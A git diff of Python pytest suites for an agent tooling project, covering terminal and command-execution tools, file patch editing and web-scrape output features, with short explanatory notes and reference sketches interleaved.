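    return _snapshots.get(path) == hashlib.sha256(data).hexdigest()
```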
+3
View File
@@ -2,10 +2,13 @@
from __future__ import annotations
import sys
import time
import pytest
pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
@pytest.fixture
def exec_tool(mcp):
+4 -3
View File
@@ -2,10 +2,13 @@
from __future__ import annotations
import sys
import time
import pytest
pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
@pytest.fixture
def job_tools(mcp):
@@ -63,9 +66,7 @@ def test_merge_stderr(job_tools):
merge_stderr=True,
)
job_id = started["job_id"]
result = job_tools["logs"](
job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5
)
result = job_tools["logs"](job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5)
assert "stdout1" in result["data"]
assert "stderr1" in result["data"]
@@ -3,9 +3,12 @@
from __future__ import annotations
import shutil
import sys
import pytest
pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
@pytest.fixture
def search_tools(mcp):
@@ -2,8 +2,12 @@
from __future__ import annotations
import sys
import pytest
pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
def test_resolve_shell_rejects_zsh():
from terminal_tools.common.limits import ZshRefused, _resolve_shell
+7 -3
View File
@@ -2,6 +2,12 @@
from __future__ import annotations
import sys
import pytest
pytestmark = pytest.mark.skipif(sys.platform == "win32", reason="terminal_tools is POSIX-only (uses resource module)")
EXPECTED_TOOLS = {
"terminal_exec",
"terminal_job_start",
@@ -20,9 +26,7 @@ def test_register_terminal_tools_lands_all_ten(mcp):
from terminal_tools import register_terminal_tools
names = register_terminal_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_terminal_prefix(mcp):
+6 -4
View File
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
# ── Turn 1 (seq 1-2): session start ──────────────────────────────────
# Original 2026-02 transcript called the now-deleted browser_start MCP
# tool here; cold-start is now folded into browser_open via lazy-start.
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
# ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1: browser_start ────────────────────────────────────────────
# ── Turn 1: session start ────────────────────────────────────────────
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)
# ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
t0 = time.time()
@@ -1,126 +0,0 @@
"""Tests for example_tool - A simple text processing tool."""
import pytest
from fastmcp import FastMCP
from aden_tools.tools.example_tool.example_tool import register_tools
@pytest.fixture
def example_tool_fn(mcp: FastMCP):
"""Register and return the example_tool function."""
register_tools(mcp)
return mcp._tool_manager._tools["example_tool"].fn
class TestExampleTool:
"""Tests for example_tool function."""
def test_valid_message(self, example_tool_fn):
"""Basic message returns unchanged."""
result = example_tool_fn(message="Hello, World!")
assert result == "Hello, World!"
def test_uppercase_true(self, example_tool_fn):
"""uppercase=True converts message to uppercase."""
result = example_tool_fn(message="hello", uppercase=True)
assert result == "HELLO"
def test_uppercase_false(self, example_tool_fn):
"""uppercase=False (default) preserves case."""
result = example_tool_fn(message="Hello", uppercase=False)
assert result == "Hello"
def test_repeat_multiple(self, example_tool_fn):
"""repeat=3 joins message with spaces."""
result = example_tool_fn(message="Hi", repeat=3)
assert result == "Hi Hi Hi"
def test_repeat_default(self, example_tool_fn):
"""repeat=1 (default) returns single message."""
result = example_tool_fn(message="Hello", repeat=1)
assert result == "Hello"
def test_uppercase_and_repeat_combined(self, example_tool_fn):
"""uppercase and repeat work together."""
result = example_tool_fn(message="hi", uppercase=True, repeat=2)
assert result == "HI HI"
def test_empty_message_error(self, example_tool_fn):
"""Empty string returns error string."""
result = example_tool_fn(message="")
assert "Error" in result
assert "1-1000" in result
def test_message_too_long_error(self, example_tool_fn):
"""Message over 1000 chars returns error string."""
long_message = "x" * 1001
result = example_tool_fn(message=long_message)
assert "Error" in result
assert "1-1000" in result
def test_message_at_max_length(self, example_tool_fn):
"""Message exactly 1000 chars is valid."""
max_message = "x" * 1000
result = example_tool_fn(message=max_message)
assert result == max_message
def test_repeat_zero_error(self, example_tool_fn):
"""repeat=0 returns error string."""
result = example_tool_fn(message="Hi", repeat=0)
assert "Error" in result
assert "1-10" in result
def test_repeat_eleven_error(self, example_tool_fn):
"""repeat=11 returns error string."""
result = example_tool_fn(message="Hi", repeat=11)
assert "Error" in result
assert "1-10" in result
def test_repeat_at_max(self, example_tool_fn):
"""repeat=10 (maximum) is valid."""
result = example_tool_fn(message="Hi", repeat=10)
assert result == " ".join(["Hi"] * 10)
def test_repeat_negative_error(self, example_tool_fn):
"""Negative repeat returns error string."""
result = example_tool_fn(message="Hi", repeat=-1)
assert "Error" in result
assert "1-10" in result
def test_whitespace_only_message(self, example_tool_fn):
"""Whitespace-only message is valid (non-empty)."""
result = example_tool_fn(message=" ")
assert result == " "
def test_special_characters_in_message(self, example_tool_fn):
"""Special characters are preserved."""
result = example_tool_fn(message="Hello! @#$%^&*()")
assert result == "Hello! @#$%^&*()"
def test_unicode_message(self, example_tool_fn):
"""Unicode characters are handled correctly."""
result = example_tool_fn(message="Hello 世界 🌍")
assert result == "Hello 世界 🌍"
def test_unicode_uppercase(self, example_tool_fn):
"""Unicode uppercase conversion works."""
result = example_tool_fn(message="café", uppercase=True)
assert result == "CAFÉ"
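The deleted suite above fully pins down example_tool's contract: message length 1-1000, repeat 1-10, optional uppercase, repeats joined with spaces, validation failures returned as error strings. For reference, a minimal sketch that would satisfy those assertions — reconstructed from the tests, not the removed implementation:

```python
def example_tool(message: str, uppercase: bool = False, repeat: int = 1) -> str:
    # Hypothetical reconstruction from the deleted tests; the real
    # aden_tools example_tool may have differed in wording and structure.
    if not 1 <= len(message) <= 1000:
        return "Error: message must be 1-1000 characters"
    if not 1 <= repeat <= 10:
        return "Error: repeat must be 1-10"
    if uppercase:
        message = message.upper()
    # repeat=3 joins the message with single spaces: "Hi Hi Hi"
    return " ".join([message] * repeat)
```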
@@ -280,7 +280,7 @@ class TestPatchToolReplaceMode:
result = edit_fn(
mode="replace",
path="b.py",
-            old_string='print(“hi”)',
+            old_string="print(“hi”)",
new_string='print("HELLO")',
)
assert "Error" not in result
@@ -331,14 +331,7 @@ class TestPatchToolPatchMode:
"""A V4A Update hunk replaces matched lines and writes."""
target = tmp_path / "u.py"
target.write_text("def f():\n return 1\n", encoding="utf-8")
-        body = (
-            "*** Begin Patch\n"
-            "*** Update File: u.py\n"
-            " def f():\n"
-            "- return 1\n"
-            "+ return 42\n"
-            "*** End Patch\n"
-        )
+        body = "*** Begin Patch\n*** Update File: u.py\n def f():\n- return 1\n+ return 42\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -347,13 +340,7 @@ class TestPatchToolPatchMode:
def test_patch_add_file(self, file_ops_mcp, tmp_path):
"""Add File: creates a new file from + lines."""
-        body = (
-            "*** Begin Patch\n"
-            "*** Add File: new.py\n"
-            "+# new\n"
-            "+x = 1\n"
-            "*** End Patch\n"
-        )
+        body = "*** Begin Patch\n*** Add File: new.py\n+# new\n+x = 1\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -1,226 +0,0 @@
"""Tests for the remaining file_system_toolkits — execute_command_tool only.
The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
"""
import asyncio
import os
import sys
from unittest.mock import patch
import pytest
from fastmcp import FastMCP
@pytest.fixture
def mcp():
"""Create a FastMCP instance."""
return FastMCP("test-server")
@pytest.fixture
def mock_workspace():
"""Mock agent ID for the shell tool."""
return {"agent_id": "test-agent"}
@pytest.fixture
def mock_secure_path(tmp_path):
"""Patch the shell tool's sandbox resolver onto tmp_path."""
def _get_sandboxed_path(path, agent_id):
return os.path.join(tmp_path, path)
with (
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.get_sandboxed_path",
side_effect=_get_sandboxed_path,
),
patch(
"aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.AGENT_SANDBOXES_DIR",
str(tmp_path),
),
):
yield
class TestExecuteCommandTool:
"""Tests for execute_command_tool."""
@pytest.fixture
def execute_command_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["execute_command_tool"].fn
async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a simple command returns output."""
result = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "Hello World" in result["stdout"]
async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a failing command returns non-zero exit code."""
result = await execute_command_fn(command="exit 1", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 1
async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command that writes to stderr captures it."""
result = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
assert result["success"] is True
assert "error message" in result.get("stderr", "")
async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
"""Executing ls command lists files."""
(tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
result = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "testfile.txt" in result["stdout"]
async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
"""Executing a command with pipe works correctly."""
result = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
assert result["success"] is True
assert result["return_code"] == 0
assert "HELLO WORLD" in result["stdout"]
@pytest.fixture
def bash_output_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_output"].fn
@pytest.fixture
def bash_kill_fn(self, mcp):
from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools
register_tools(mcp)
return mcp._tool_manager._tools["bash_kill"].fn
async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A per-call timeout under the default kills the command early."""
import time
start = time.monotonic()
result = await execute_command_fn(
command="sleep 10",
timeout_seconds=1,
**mock_workspace,
)
elapsed = time.monotonic() - start
assert result.get("timed_out") is True
assert "1 seconds" in result.get("error", "")
assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"
async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
"""A timeout above the 600s ceiling is silently clamped."""
result = await execute_command_fn(
command="echo fast",
timeout_seconds=99999,
**mock_workspace,
)
assert result["success"] is True
assert "fast" in result["stdout"]
async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
"""The event loop keeps servicing other tasks while a bash command runs."""
ticks = 0
async def ticker():
nonlocal ticks
for _ in range(20):
await asyncio.sleep(0.05)
ticks += 1
ticker_task = asyncio.create_task(ticker())
result = await execute_command_fn(command="sleep 0.5", **mock_workspace)
await ticker_task
assert result["success"] is True
assert ticks >= 5, f"event loop looked blocked during subprocess (only {ticks} ticks in 1s)"
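The event-loop test above only passes if the command runs as an asyncio subprocess rather than a blocking call. A hedged sketch of that pattern — an assumed shape, since the actual execute_command_tool internals are not shown in this diff — including the timeout clamping the earlier tests exercise:

```python
import asyncio

async def run_command(command: str, timeout_seconds: float = 30.0) -> dict:
    # Sketch only: the subprocess is awaited on the event loop, so other
    # tasks (like the ticker in the test above) keep being serviced.
    timeout = min(max(timeout_seconds, 1.0), 600.0)  # clamp to the 600s ceiling
    proc = await asyncio.create_subprocess_shell(
        command,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
    )
    try:
        stdout, stderr = await asyncio.wait_for(proc.communicate(), timeout)
    except asyncio.TimeoutError:
        proc.kill()
        await proc.wait()
        return {"success": False, "timed_out": True,
                "error": f"command killed after {timeout:g} seconds"}
    return {
        "success": True,
        "return_code": proc.returncode,
        "stdout": stdout.decode(),
        "stderr": stderr.decode(),
    }
```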
async def test_background_job_start_poll_and_complete(
self,
execute_command_fn,
bash_output_fn,
mock_workspace,
mock_secure_path,
):
"""A run_in_background job can be started, polled, and reports its exit status."""
py_script = (
"import time,sys;"
"print('one');sys.stdout.flush();time.sleep(0.1);"
"print('two');sys.stdout.flush();time.sleep(0.1);"
"print('three')"
)
start_result = await execute_command_fn(
command=f'"{sys.executable}" -c "{py_script}"',
run_in_background=True,
**mock_workspace,
)
assert start_result["background"] is True
job_id = start_result["id"]
deadline = asyncio.get_event_loop().time() + 5.0
seen_text = ""
while asyncio.get_event_loop().time() < deadline:
poll = await bash_output_fn(id=job_id, **mock_workspace)
seen_text += poll["stdout"]
if poll["status"].startswith("exited"):
break
await asyncio.sleep(0.05)
assert "one" in seen_text
assert "two" in seen_text
assert "three" in seen_text
assert poll["status"] == "exited(0)"
async def test_background_job_kill(
self,
execute_command_fn,
bash_output_fn,
bash_kill_fn,
mock_workspace,
mock_secure_path,
):
"""bash_kill terminates a long-running background job."""
start_result = await execute_command_fn(
command="sleep 30",
run_in_background=True,
**mock_workspace,
)
job_id = start_result["id"]
kill_result = await bash_kill_fn(id=job_id, **mock_workspace)
assert kill_result["id"] == job_id
assert "terminated" in kill_result["status"] or "killed" in kill_result["status"]
poll = await bash_output_fn(id=job_id, **mock_workspace)
assert "no background job" in poll.get("error", "")
async def test_bash_output_isolated_across_agents(self, execute_command_fn, bash_output_fn, mock_secure_path):
"""Agent A's job id is not reachable from agent B."""
start = await execute_command_fn(
command="sleep 5",
run_in_background=True,
agent_id="agent-A",
)
poll_b = await bash_output_fn(id=start["id"], agent_id="agent-B")
assert "no background job" in poll_b.get("error", "")
from aden_tools.tools.file_system_toolkits.execute_command_tool import background_jobs
await background_jobs.clear_agent("agent-A")
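The isolation test keys jobs by agent, so agent B cannot poll agent A's job id. A minimal sketch of such a registry — hypothetical; the real background_jobs object in execute_command_tool also owns the underlying processes:

```python
import itertools

class BackgroundJobs:
    # Illustrative bookkeeping only: job ids resolve only under the
    # agent_id that started them, matching the cross-agent test above.
    def __init__(self):
        self._jobs = {}
        self._ids = itertools.count(1)

    def start(self, agent_id: str, command: str) -> str:
        job_id = f"job-{next(self._ids)}"
        self._jobs[(agent_id, job_id)] = {"command": command, "status": "running"}
        return job_id

    def poll(self, agent_id: str, job_id: str) -> dict:
        job = self._jobs.get((agent_id, job_id))
        if job is None:
            return {"error": f"no background job {job_id!r} for this agent"}
        return job
```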
@@ -374,6 +374,188 @@ class TestWebScrapeToolLinkConversion:
assert len([t for t in texts if not t.strip()]) == 0
class TestWebScrapeToolAIFriendlyOutput:
"""Tests for the AI-friendly output additions: structured data,
headings, page_type, block-level newlines, inline links, truncation
metadata, and offset-based pagination."""
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_block_level_newlines_preserved(self, mock_pw, mock_stealth, web_scrape_fn):
"""Block elements (p, h1, li) produce newlines, not space-collapsed."""
html = """
<html><body>
<h1>Title</h1>
<p>First paragraph.</p>
<p>Second paragraph.</p>
<ul><li>Item one</li><li>Item two</li></ul>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert "error" not in result
content = result["content"]
assert "Title" in content
assert "First paragraph." in content
assert "Second paragraph." in content
# Block separation should produce newlines, not run paragraphs together
assert "First paragraph.\n" in content or "First paragraph.\n\nSecond" in content
assert "Item one" in content and "Item two" in content
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_headings_outline_returned(self, mock_pw, mock_stealth, web_scrape_fn):
"""Headings outline lists h1-h6 with level + text."""
html = """
<html><body>
<h1>Top</h1>
<h2>Section A</h2>
<h3>Sub A1</h3>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["headings"] == [
{"level": 1, "text": "Top"},
{"level": 2, "text": "Section A"},
{"level": 3, "text": "Sub A1"},
]
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_inline_links_when_include_links(self, mock_pw, mock_stealth, web_scrape_fn):
"""include_links=True inlines anchors as [text](url) in content."""
html = """
<html><body>
<p>See <a href="/docs">our docs</a> for details.</p>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", include_links=True)
assert "[our docs](https://example.com/docs)" in result["content"]
# Separate links list still present for back-compat
assert any(link["text"] == "our docs" for link in result["links"])
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_structured_data_json_ld(self, mock_pw, mock_stealth, web_scrape_fn):
"""JSON-LD blocks are parsed and surfaced under structured_data."""
html = """
<html><head>
<script type="application/ld+json">
{"@type": "Article", "headline": "Hello"}
</script>
</head><body><p>body</p></body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert "structured_data" in result
assert result["structured_data"]["json_ld"] == [{"@type": "Article", "headline": "Hello"}]
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_structured_data_open_graph(self, mock_pw, mock_stealth, web_scrape_fn):
"""OpenGraph meta tags are surfaced under structured_data.open_graph."""
html = """
<html><head>
<meta property="og:title" content="OG Title">
<meta property="og:type" content="article">
</head><body><p>body</p></body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["structured_data"]["open_graph"] == {
"title": "OG Title",
"type": "article",
}
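The two structured-data tests assume JSON-LD is read from `<script type="application/ld+json">` blocks and OpenGraph from `og:`-prefixed `<meta>` tags. A stdlib-only sketch of that extraction — illustrative only, as the real web_scrape tool may use a different HTML library:

```python
import json
from html.parser import HTMLParser

class StructuredDataParser(HTMLParser):
    # Collects the two shapes the tests assert on: a json_ld list and an
    # open_graph dict keyed by the property name minus its "og:" prefix.
    def __init__(self):
        super().__init__()
        self.json_ld = []
        self.open_graph = {}
        self._in_json_ld = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("type") == "application/ld+json":
            self._in_json_ld = True
        elif tag == "meta" and attrs.get("property", "").startswith("og:"):
            self.open_graph[attrs["property"][3:]] = attrs.get("content", "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_json_ld = False

    def handle_data(self, data):
        if self._in_json_ld and data.strip():
            self.json_ld.append(json.loads(data))
```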
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_truncation_metadata(self, mock_pw, mock_stealth, web_scrape_fn):
"""Truncated responses set truncated/total_length/next_offset."""
html = f"<html><body>{'a' * 5000}</body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", max_length=1000)
assert result["truncated"] is True
assert result["total_length"] == 5000
assert result["next_offset"] == 1000
assert result["offset"] == 0
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_offset_pagination(self, mock_pw, mock_stealth, web_scrape_fn):
"""offset arg returns content starting from the given character."""
body = "a" * 1000 + "b" * 1000 + "c" * 1000
html = f"<html><body>{body}</body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com", max_length=1000, offset=1000)
assert result["offset"] == 1000
# Window should start in the b-region
assert result["content"].startswith("b")
assert result["truncated"] is True
assert result["next_offset"] == 2000
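The truncation and pagination tests above imply a simple character-window contract. A hypothetical helper capturing it — parameter names mirror the test calls, not a confirmed API:

```python
def paginate(content: str, offset: int = 0, max_length: int = 2000) -> dict:
    # Sketch of the offset/truncation contract exercised by the tests:
    # return a window of at most max_length chars starting at offset,
    # plus metadata telling the caller where to resume.
    total = len(content)
    window = content[offset:offset + max_length]
    end = offset + len(window)
    return {
        "content": window,
        "offset": offset,
        "total_length": total,
        "truncated": end < total,
        "next_offset": end if end < total else None,
    }
```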
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_page_type_listing(self, mock_pw, mock_stealth, web_scrape_fn):
"""3+ <article> elements => page_type 'listing'."""
html = """
<html><body>
<article><h2>Post 1</h2></article>
<article><h2>Post 2</h2></article>
<article><h2>Post 3</h2></article>
</body></html>
"""
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["page_type"] == "listing"
@pytest.mark.asyncio
@patch(_STEALTH_PATH)
@patch(_PW_PATH)
async def test_page_type_article(self, mock_pw, mock_stealth, web_scrape_fn):
"""Single <article> => page_type 'article'."""
html = "<html><body><article><p>Hello</p></article></body></html>"
mock_cm, _, _ = _make_playwright_mocks(html, final_url="https://example.com")
mock_pw.return_value = mock_cm
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com")
assert result["page_type"] == "article"
class TestWebScrapeToolErrorHandling:
"""Tests for error handling and early exit before JS wait."""
@@ -388,7 +570,9 @@ class TestWebScrapeToolErrorHandling:
mock_stealth.return_value.apply_stealth_async = AsyncMock()
result = await web_scrape_fn(url="https://example.com/missing")
-        assert result == {"error": "HTTP 404: Failed to fetch URL"}
+        assert result["error"] == "HTTP 404: Failed to fetch URL"
+        assert result["status"] == 404
+        assert "hint" in result
mock_page.wait_for_load_state.assert_not_called()
@pytest.mark.asyncio